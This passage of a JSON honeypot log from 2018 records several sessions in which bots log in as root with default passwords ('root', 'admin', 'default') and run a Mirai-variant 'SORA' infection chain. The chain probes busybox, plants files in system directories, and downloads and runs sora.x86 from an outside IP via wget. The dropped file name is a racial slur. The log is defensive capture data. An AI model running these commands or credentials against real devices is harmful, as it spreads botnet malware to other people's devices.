  1622. {
  1623. "@timestamp": "2018-09-15T04:19:28.459Z",
  1624. "eventid": "command.input",
  1625. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  1626. },
  1627. {
  1628. "@timestamp": "2018-09-15T04:19:28.367Z",
  1629. "eventid": "command.input",
  1630. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  1631. },
  1632. {
  1633. "@timestamp": "2018-09-15T04:19:28.002Z",
  1634. "eventid": "command.input",
  1635. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1636. },
  1637. {
  1638. "@timestamp": "2018-09-15T04:19:27.907Z",
  1639. "eventid": "command.input",
  1640. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  1641. },
  1642. {
  1643. "@timestamp": "2018-09-15T04:19:27.772Z",
  1644. "eventid": "command.input",
  1645. "input": "/bin/busybox SORA"
  1646. },
  1647. {
  1648. "@timestamp": "2018-09-15T04:19:27.680Z",
  1649. "eventid": "command.input",
  1650. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  1651. },
  1652. {
  1653. "@timestamp": "2018-09-15T04:19:27.580Z",
  1654. "eventid": "command.input",
  1655. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1656. },
  1657. {
  1658. "@timestamp": "2018-09-15T04:19:27.571Z",
  1659. "eventid": "command.input",
  1660. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  1661. },
  1662. {
  1663. "@timestamp": "2018-09-15T04:19:27.570Z",
  1664. "eventid": "command.input",
  1665. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  1666. },
  1667. {
  1668. "@timestamp": "2018-09-15T04:19:27.561Z",
  1669. "eventid": "command.input",
  1670. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  1671. },
  1672. {
  1673. "@timestamp": "2018-09-15T04:19:27.559Z",
  1674. "eventid": "command.input",
  1675. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  1676. },
  1677. {
  1678. "@timestamp": "2018-09-15T04:19:27.552Z",
  1679. "eventid": "command.input",
  1680. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  1681. },
  1682. {
  1683. "@timestamp": "2018-09-15T04:19:27.550Z",
  1684. "eventid": "command.input",
  1685. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  1686. },
  1687. {
  1688. "@timestamp": "2018-09-15T04:19:27.542Z",
  1689. "eventid": "command.input",
  1690. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  1691. },
  1692. {
  1693. "@timestamp": "2018-09-15T04:19:27.540Z",
  1694. "eventid": "command.input",
  1695. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  1696. },
  1697. {
  1698. "@timestamp": "2018-09-15T04:19:27.531Z",
  1699. "eventid": "command.input",
  1700. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  1701. },
  1702. {
  1703. "@timestamp": "2018-09-15T04:19:27.529Z",
  1704. "eventid": "command.input",
  1705. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  1706. },
  1707. {
  1708. "@timestamp": "2018-09-15T04:19:27.522Z",
  1709. "eventid": "command.input",
  1710. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  1711. },
  1712. {
  1713. "@timestamp": "2018-09-15T04:19:27.518Z",
  1714. "eventid": "command.input",
  1715. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  1716. },
  1717. {
  1718. "@timestamp": "2018-09-15T04:19:27.517Z",
  1719. "eventid": "command.input",
  1720. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  1721. },
  1722. {
  1723. "@timestamp": "2018-09-15T04:19:27.509Z",
  1724. "eventid": "command.input",
  1725. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  1726. },
  1727. {
  1728. "@timestamp": "2018-09-15T04:19:27.507Z",
  1729. "eventid": "command.input",
  1730. "input": "sh"
  1731. },
  1732. {
  1733. "@timestamp": "2018-09-15T04:19:27.499Z",
  1734. "eventid": "command.input",
  1735. "input": "shell"
  1736. },
  1737. {
  1738. "@timestamp": "2018-09-15T04:19:27.496Z",
  1739. "eventid": "command.input",
  1740. "input": "system"
  1741. },
  1742. {
  1743. "@timestamp": "2018-09-15T04:19:27.405Z",
  1744. "eventid": "command.input",
  1745. "input": "enable"
  1746. },
  1747. {
  1748. "@timestamp": "2018-09-15T04:19:27.305Z",
  1749. "eventid": "command.input",
  1750. "input": ""
  1751. },
  1752. {
  1753. "@timestamp": "2018-09-15T04:19:25.746Z",
  1754. "eventid": "login.success",
  1755. "geoip": {
  1756. "city_name": "Las Vegas",
  1757. "country_name": "United States"
  1758. },
  1759. "password": "t0talc0ntr0l4!",
  1760. "username": "root"
  1761. }
  1762. ],
  1763. "bfa63a6b165d": [
  1764. {
  1765. "@timestamp": "2018-09-15T04:21:08.882Z",
  1766. "eventid": "command.input",
  1767. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  1768. },
  1769. {
  1770. "@timestamp": "2018-09-15T04:21:08.789Z",
  1771. "eventid": "command.input",
  1772. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  1773. },
  1774. {
  1775. "@timestamp": "2018-09-15T04:21:08.401Z",
  1776. "eventid": "command.input",
  1777. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1778. },
  1779. {
  1780. "@timestamp": "2018-09-15T04:21:08.300Z",
  1781. "eventid": "command.input",
  1782. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  1783. },
  1784. {
  1785. "@timestamp": "2018-09-15T04:21:08.205Z",
  1786. "eventid": "command.input",
  1787. "input": "/bin/busybox SORA"
  1788. },
  1789. {
  1790. "@timestamp": "2018-09-15T04:21:08.104Z",
  1791. "eventid": "command.input",
  1792. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  1793. },
  1794. {
  1795. "@timestamp": "2018-09-15T04:21:07.997Z",
  1796. "eventid": "command.input",
  1797. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1798. },
  1799. {
  1800. "@timestamp": "2018-09-15T04:21:07.987Z",
  1801. "eventid": "command.input",
  1802. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  1803. },
  1804. {
  1805. "@timestamp": "2018-09-15T04:21:07.978Z",
  1806. "eventid": "command.input",
  1807. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  1808. },
  1809. {
  1810. "@timestamp": "2018-09-15T04:21:07.976Z",
  1811. "eventid": "command.input",
  1812. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  1813. },
  1814. {
  1815. "@timestamp": "2018-09-15T04:21:07.969Z",
  1816. "eventid": "command.input",
  1817. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  1818. },
  1819. {
  1820. "@timestamp": "2018-09-15T04:21:07.959Z",
  1821. "eventid": "command.input",
  1822. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  1823. },
  1824. {
  1825. "@timestamp": "2018-09-15T04:21:07.957Z",
  1826. "eventid": "command.input",
  1827. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  1828. },
  1829. {
  1830. "@timestamp": "2018-09-15T04:21:07.949Z",
  1831. "eventid": "command.input",
  1832. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  1833. },
  1834. {
  1835. "@timestamp": "2018-09-15T04:21:07.948Z",
  1836. "eventid": "command.input",
  1837. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  1838. },
  1839. {
  1840. "@timestamp": "2018-09-15T04:21:07.940Z",
  1841. "eventid": "command.input",
  1842. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  1843. },
  1844. {
  1845. "@timestamp": "2018-09-15T04:21:07.929Z",
  1846. "eventid": "command.input",
  1847. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  1848. },
  1849. {
  1850. "@timestamp": "2018-09-15T04:21:07.927Z",
  1851. "eventid": "command.input",
  1852. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  1853. },
  1854. {
  1855. "@timestamp": "2018-09-15T04:21:07.919Z",
  1856. "eventid": "command.input",
  1857. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  1858. },
  1859. {
  1860. "@timestamp": "2018-09-15T04:21:07.917Z",
  1861. "eventid": "command.input",
  1862. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  1863. },
  1864. {
  1865. "@timestamp": "2018-09-15T04:21:07.910Z",
  1866. "eventid": "command.input",
  1867. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  1868. },
  1869. {
  1870. "@timestamp": "2018-09-15T04:21:07.907Z",
  1871. "eventid": "command.input",
  1872. "input": "sh"
  1873. },
  1874. {
  1875. "@timestamp": "2018-09-15T04:21:07.900Z",
  1876. "eventid": "command.input",
  1877. "input": "shell"
  1878. },
  1879. {
  1880. "@timestamp": "2018-09-15T04:21:07.897Z",
  1881. "eventid": "command.input",
  1882. "input": "system"
  1883. },
  1884. {
  1885. "@timestamp": "2018-09-15T04:21:07.809Z",
  1886. "eventid": "command.input",
  1887. "input": "enable"
  1888. },
  1889. {
  1890. "@timestamp": "2018-09-15T04:21:07.715Z",
  1891. "eventid": "command.input",
  1892. "input": ""
  1893. },
  1894. {
  1895. "@timestamp": "2018-09-15T04:21:06.830Z",
  1896. "eventid": "login.success",
  1897. "geoip": {
  1898. "city_name": "Las Vegas",
  1899. "country_name": "United States"
  1900. },
  1901. "password": "default",
  1902. "username": "root"
  1903. }
  1904. ],
  1905. "c6a1f7b085e2": [
  1906. {
  1907. "@timestamp": "2018-09-15T04:12:47.091Z",
  1908. "eventid": "command.input",
  1909. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  1910. },
  1911. {
  1912. "@timestamp": "2018-09-15T04:12:47.000Z",
  1913. "eventid": "command.input",
  1914. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  1915. },
  1916. {
  1917. "@timestamp": "2018-09-15T04:12:46.640Z",
  1918. "eventid": "command.input",
  1919. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1920. },
  1921. {
  1922. "@timestamp": "2018-09-15T04:12:46.540Z",
  1923. "eventid": "command.input",
  1924. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  1925. },
  1926. {
  1927. "@timestamp": "2018-09-15T04:12:46.449Z",
  1928. "eventid": "command.input",
  1929. "input": "/bin/busybox SORA"
  1930. },
  1931. {
  1932. "@timestamp": "2018-09-15T04:12:46.346Z",
  1933. "eventid": "command.input",
  1934. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  1935. },
  1936. {
  1937. "@timestamp": "2018-09-15T04:12:46.246Z",
  1938. "eventid": "command.input",
  1939. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  1940. },
  1941. {
  1942. "@timestamp": "2018-09-15T04:12:46.237Z",
  1943. "eventid": "command.input",
  1944. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  1945. },
  1946. {
  1947. "@timestamp": "2018-09-15T04:12:46.235Z",
  1948. "eventid": "command.input",
  1949. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  1950. },
  1951. {
  1952. "@timestamp": "2018-09-15T04:12:46.228Z",
  1953. "eventid": "command.input",
  1954. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  1955. },
  1956. {
  1957. "@timestamp": "2018-09-15T04:12:46.226Z",
  1958. "eventid": "command.input",
  1959. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  1960. },
  1961. {
  1962. "@timestamp": "2018-09-15T04:12:46.218Z",
  1963. "eventid": "command.input",
  1964. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  1965. },
  1966. {
  1967. "@timestamp": "2018-09-15T04:12:46.216Z",
  1968. "eventid": "command.input",
  1969. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  1970. },
  1971. {
  1972. "@timestamp": "2018-09-15T04:12:46.208Z",
  1973. "eventid": "command.input",
  1974. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  1975. },
  1976. {
  1977. "@timestamp": "2018-09-15T04:12:46.207Z",
  1978. "eventid": "command.input",
  1979. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  1980. },
  1981. {
  1982. "@timestamp": "2018-09-15T04:12:46.205Z",
  1983. "eventid": "command.input",
  1984. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  1985. },
  1986. {
  1987. "@timestamp": "2018-09-15T04:12:46.198Z",
  1988. "eventid": "command.input",
  1989. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  1990. },
  1991. {
  1992. "@timestamp": "2018-09-15T04:12:46.197Z",
  1993. "eventid": "command.input",
  1994. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  1995. },
  1996. {
  1997. "@timestamp": "2018-09-15T04:12:46.189Z",
  1998. "eventid": "command.input",
  1999. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  2000. },
  2001. {
  2002. "@timestamp": "2018-09-15T04:12:46.188Z",
  2003. "eventid": "command.input",
  2004. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  2005. },
  2006. {
  2007. "@timestamp": "2018-09-15T04:12:46.186Z",
  2008. "eventid": "command.input",
  2009. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  2010. },
  2011. {
  2012. "@timestamp": "2018-09-15T04:12:46.179Z",
  2013. "eventid": "command.input",
  2014. "input": "sh"
  2015. },
  2016. {
  2017. "@timestamp": "2018-09-15T04:12:46.177Z",
  2018. "eventid": "command.input",
  2019. "input": "shell"
  2020. },
  2021. {
  2022. "@timestamp": "2018-09-15T04:12:46.175Z",
  2023. "eventid": "command.input",
  2024. "input": "system"
  2025. },
  2026. {
  2027. "@timestamp": "2018-09-15T04:12:46.085Z",
  2028. "eventid": "command.input",
  2029. "input": "enable"
  2030. },
  2031. {
  2032. "@timestamp": "2018-09-15T04:12:45.897Z",
  2033. "eventid": "command.input",
  2034. "input": ""
  2035. },
  2036. {
  2037. "@timestamp": "2018-09-15T04:12:45.072Z",
  2038. "eventid": "login.success",
  2039. "geoip": {
  2040. "city_name": "Las Vegas",
  2041. "country_name": "United States"
  2042. },
  2043. "password": "root",
  2044. "username": "root"
  2045. }
  2046. ],
  2047. "cfdeac26605e": [
  2048. {
  2049. "@timestamp": "2018-09-15T04:12:40.806Z",
  2050. "eventid": "command.input",
  2051. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  2052. },
  2053. {
  2054. "@timestamp": "2018-09-15T04:12:40.760Z",
  2055. "eventid": "command.input",
  2056. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  2057. },
  2058. {
  2059. "@timestamp": "2018-09-15T04:12:40.581Z",
  2060. "eventid": "command.input",
  2061. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  2062. },
  2063. {
  2064. "@timestamp": "2018-09-15T04:12:40.531Z",
  2065. "eventid": "command.input",
  2066. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  2067. },
  2068. {
  2069. "@timestamp": "2018-09-15T04:12:40.445Z",
  2070. "eventid": "command.input",
  2071. "input": "/bin/busybox SORA"
  2072. },
  2073. {
  2074. "@timestamp": "2018-09-15T04:12:40.398Z",
  2075. "eventid": "command.input",
  2076. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  2077. },
  2078. {
  2079. "@timestamp": "2018-09-15T04:12:40.346Z",
  2080. "eventid": "command.input",
  2081. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  2082. },
  2083. {
  2084. "@timestamp": "2018-09-15T04:12:40.342Z",
  2085. "eventid": "command.input",
  2086. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  2087. },
  2088. {
  2089. "@timestamp": "2018-09-15T04:12:40.339Z",
  2090. "eventid": "command.input",
  2091. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  2092. },
  2093. {
  2094. "@timestamp": "2018-09-15T04:12:40.337Z",
  2095. "eventid": "command.input",
  2096. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  2097. },
  2098. {
  2099. "@timestamp": "2018-09-15T04:12:40.335Z",
  2100. "eventid": "command.input",
  2101. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  2102. },
  2103. {
  2104. "@timestamp": "2018-09-15T04:12:40.332Z",
  2105. "eventid": "command.input",
  2106. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  2107. },
  2108. {
  2109. "@timestamp": "2018-09-15T04:12:40.329Z",
  2110. "eventid": "command.input",
  2111. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  2112. },
  2113. {
  2114. "@timestamp": "2018-09-15T04:12:40.326Z",
  2115. "eventid": "command.input",
  2116. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  2117. },
  2118. {
  2119. "@timestamp": "2018-09-15T04:12:40.324Z",
  2120. "eventid": "command.input",
  2121. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  2122. },
  2123. {
  2124. "@timestamp": "2018-09-15T04:12:40.322Z",
  2125. "eventid": "command.input",
  2126. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  2127. },
  2128. {
  2129. "@timestamp": "2018-09-15T04:12:40.319Z",
  2130. "eventid": "command.input",
  2131. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  2132. },
  2133. {
  2134. "@timestamp": "2018-09-15T04:12:40.317Z",
  2135. "eventid": "command.input",
  2136. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  2137. },
  2138. {
  2139. "@timestamp": "2018-09-15T04:12:40.314Z",
  2140. "eventid": "command.input",
  2141. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  2142. },
  2143. {
  2144. "@timestamp": "2018-09-15T04:12:40.312Z",
  2145. "eventid": "command.input",
  2146. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  2147. },
  2148. {
  2149. "@timestamp": "2018-09-15T04:12:40.310Z",
  2150. "eventid": "command.input",
  2151. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  2152. },
  2153. {
  2154. "@timestamp": "2018-09-15T04:12:40.308Z",
  2155. "eventid": "command.input",
  2156. "input": "sh"
  2157. },
  2158. {
  2159. "@timestamp": "2018-09-15T04:12:40.305Z",
  2160. "eventid": "command.input",
  2161. "input": "shell"
  2162. },
  2163. {
  2164. "@timestamp": "2018-09-15T04:12:40.302Z",
  2165. "eventid": "command.input",
  2166. "input": "system"
  2167. },
  2168. {
  2169. "@timestamp": "2018-09-15T04:12:40.261Z",
  2170. "eventid": "command.input",
  2171. "input": "enable"
  2172. },
  2173. {
  2174. "@timestamp": "2018-09-15T04:12:40.156Z",
  2175. "eventid": "command.input",
  2176. "input": ""
  2177. },
  2178. {
  2179. "@timestamp": "2018-09-15T04:12:39.646Z",
  2180. "eventid": "login.success",
  2181. "geoip": {
  2182. "city_name": "Las Vegas",
  2183. "country_name": "United States"
  2184. },
  2185. "password": "admin",
  2186. "username": "root"
  2187. }
  2188. ],
  2189. "e193b44265c4": [
  2190. {
  2191. "@timestamp": "2018-09-15T04:13:59.405Z",
  2192. "eventid": "command.input",
  2193. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  2194. },
  2195. {
  2196. "@timestamp": "2018-09-15T04:13:59.325Z",
  2197. "eventid": "command.input",
  2198. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  2199. },
  2200. {
  2201. "@timestamp": "2018-09-15T04:13:59.008Z",
  2202. "eventid": "command.input",
  2203. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  2204. },
  2205. {
  2206. "@timestamp": "2018-09-15T04:13:58.926Z",
  2207. "eventid": "command.input",
  2208. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  2209. },
  2210. {
  2211. "@timestamp": "2018-09-15T04:13:58.848Z",
  2212. "eventid": "command.input",
  2213. "input": "/bin/busybox SORA"
  2214. },
  2215. {
  2216. "@timestamp": "2018-09-15T04:13:58.762Z",
  2217. "eventid": "command.input",
  2218. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  2219. },
  2220. {
  2221. "@timestamp": "2018-09-15T04:13:58.679Z",
  2222. "eventid": "command.input",
  2223. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  2224. },
  2225. {
  2226. "@timestamp": "2018-09-15T04:13:58.675Z",
  2227. "eventid": "command.input",
  2228. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  2229. },
  2230. {
  2231. "@timestamp": "2018-09-15T04:13:58.673Z",
  2232. "eventid": "command.input",
  2233. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  2234. },
  2235. {
  2236. "@timestamp": "2018-09-15T04:13:58.671Z",
  2237. "eventid": "command.input",
  2238. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  2239. },
  2240. {
  2241. "@timestamp": "2018-09-15T04:13:58.669Z",
  2242. "eventid": "command.input",
  2243. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  2244. },
  2245. {
  2246. "@timestamp": "2018-09-15T04:13:58.667Z",
  2247. "eventid": "command.input",
  2248. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  2249. },
  2250. {
  2251. "@timestamp": "2018-09-15T04:13:58.665Z",
  2252. "eventid": "command.input",
  2253. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  2254. },
  2255. {
  2256. "@timestamp": "2018-09-15T04:13:58.663Z",
  2257. "eventid": "command.input",
  2258. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  2259. },
  2260. {
  2261. "@timestamp": "2018-09-15T04:13:58.661Z",
  2262. "eventid": "command.input",
  2263. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  2264. },
  2265. {
  2266. "@timestamp": "2018-09-15T04:13:58.659Z",
  2267. "eventid": "command.input",
  2268. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  2269. },
  2270. {
  2271. "@timestamp": "2018-09-15T04:13:58.657Z",
  2272. "eventid": "command.input",
  2273. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  2274. },
  2275. {
  2276. "@timestamp": "2018-09-15T04:13:58.655Z",
  2277. "eventid": "command.input",
  2278. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  2279. },
  2280. {
  2281. "@timestamp": "2018-09-15T04:13:58.653Z",
  2282. "eventid": "command.input",
  2283. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  2284. },
  2285. {
  2286. "@timestamp": "2018-09-15T04:13:58.651Z",
  2287. "eventid": "command.input",
  2288. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
  2289. },
  2290. {
  2291. "@timestamp": "2018-09-15T04:13:58.649Z",
  2292. "eventid": "command.input",
  2293. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
  2294. },
  2295. {
  2296. "@timestamp": "2018-09-15T04:13:58.646Z",
  2297. "eventid": "command.input",
  2298. "input": "sh"
  2299. },
  2300. {
  2301. "@timestamp": "2018-09-15T04:13:58.643Z",
  2302. "eventid": "command.input",
  2303. "input": "shell"
  2304. },
  2305. {
  2306. "@timestamp": "2018-09-15T04:13:58.640Z",
  2307. "eventid": "command.input",
  2308. "input": "system"
  2309. },
  2310. {
  2311. "@timestamp": "2018-09-15T04:13:58.562Z",
  2312. "eventid": "command.input",
  2313. "input": "enable"
  2314. },
  2315. {
  2316. "@timestamp": "2018-09-15T04:13:58.484Z",
  2317. "eventid": "command.input",
  2318. "input": ""
  2319. },
  2320. {
  2321. "@timestamp": "2018-09-15T04:13:57.990Z",
  2322. "eventid": "login.success",
  2323. "geoip": {
  2324. "city_name": "Las Vegas",
  2325. "country_name": "United States"
  2326. },
  2327. "password": "root",
  2328. "username": "root"
  2329. }
  2330. ],
  2331. "e72a54537f35": [
  2332. {
  2333. "@timestamp": "2018-09-15T04:15:34.664Z",
  2334. "eventid": "command.input",
  2335. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
  2336. },
  2337. {
  2338. "@timestamp": "2018-09-15T04:15:34.573Z",
  2339. "eventid": "command.input",
  2340. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
  2341. },
  2342. {
  2343. "@timestamp": "2018-09-15T04:15:34.208Z",
  2344. "eventid": "command.input",
  2345. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  2346. },
  2347. {
  2348. "@timestamp": "2018-09-15T04:15:34.108Z",
  2349. "eventid": "command.input",
  2350. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
  2351. },
  2352. {
  2353. "@timestamp": "2018-09-15T04:15:34.004Z",
  2354. "eventid": "command.input",
  2355. "input": "/bin/busybox SORA"
  2356. },
  2357. {
  2358. "@timestamp": "2018-09-15T04:15:33.829Z",
  2359. "eventid": "command.input",
  2360. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
  2361. },
  2362. {
  2363. "@timestamp": "2018-09-15T04:15:33.725Z",
  2364. "eventid": "command.input",
  2365. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
  2366. },
  2367. {
  2368. "@timestamp": "2018-09-15T04:15:33.722Z",
  2369. "eventid": "command.input",
  2370. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
  2371. },
  2372. {
  2373. "@timestamp": "2018-09-15T04:15:33.715Z",
  2374. "eventid": "command.input",
  2375. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
  2376. },
  2377. {
  2378. "@timestamp": "2018-09-15T04:15:33.713Z",
  2379. "eventid": "command.input",
  2380. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
  2381. },
  2382. {
  2383. "@timestamp": "2018-09-15T04:15:33.706Z",
  2384. "eventid": "command.input",
  2385. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
  2386. },
  2387. {
  2388. "@timestamp": "2018-09-15T04:15:33.704Z",
  2389. "eventid": "command.input",
  2390. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
  2391. },
  2392. {
  2393. "@timestamp": "2018-09-15T04:15:33.696Z",
  2394. "eventid": "command.input",
  2395. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
  2396. },
  2397. {
  2398. "@timestamp": "2018-09-15T04:15:33.694Z",
  2399. "eventid": "command.input",
  2400. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
  2401. },
  2402. {
  2403. "@timestamp": "2018-09-15T04:15:33.693Z",
  2404. "eventid": "command.input",
  2405. "input": "\u003e/.ptmx \u0026\u0026 cd /"
  2406. },
  2407. {
  2408. "@timestamp": "2018-09-15T04:15:33.686Z",
  2409. "eventid": "command.input",
  2410. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
  2411. },
  2412. {
  2413. "@timestamp": "2018-09-15T04:15:33.684Z",
  2414. "eventid": "command.input",
  2415. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
  2416. },
  2417. {
  2418. "@timestamp": "2018-09-15T04:15:33.683Z",
  2419. "eventid": "command.input",
  2420. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
  2421. },
  2422. {
  2423. "@timestamp": "2018-09-15T04:15:33.675Z",
  2424. "eventid": "command.input",
  2425. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
  2426. },
  2427. {
